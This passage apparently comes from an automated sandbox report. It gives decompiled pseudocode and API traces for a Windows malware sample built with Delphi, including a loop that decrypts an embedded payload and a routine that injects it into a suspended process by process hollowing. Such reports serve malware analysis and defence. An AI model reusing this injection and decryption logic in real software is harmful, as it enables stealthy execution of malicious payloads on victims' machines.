    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}













    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}













    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}








    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 00000006.00000002.1482007441.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_6_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0028E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0028E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0028E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0028E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0028E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0028E35A
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0028E0C6
      • Part of subcall function 0028E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0028E0DC
      • Part of subcall function 0028E080: CreateProcessA.KERNEL32(?,00000000), ref: 0028E1C2
      • Part of subcall function 0028E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0028E1F0
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0028E54C
      • Part of subcall function 0028E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0028E493
      • Part of subcall function 0028E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0028E4B6
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000007.00000002.1489574331.0028D000.00000040.sdmp, Offset: 0028D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_28d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}


























    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
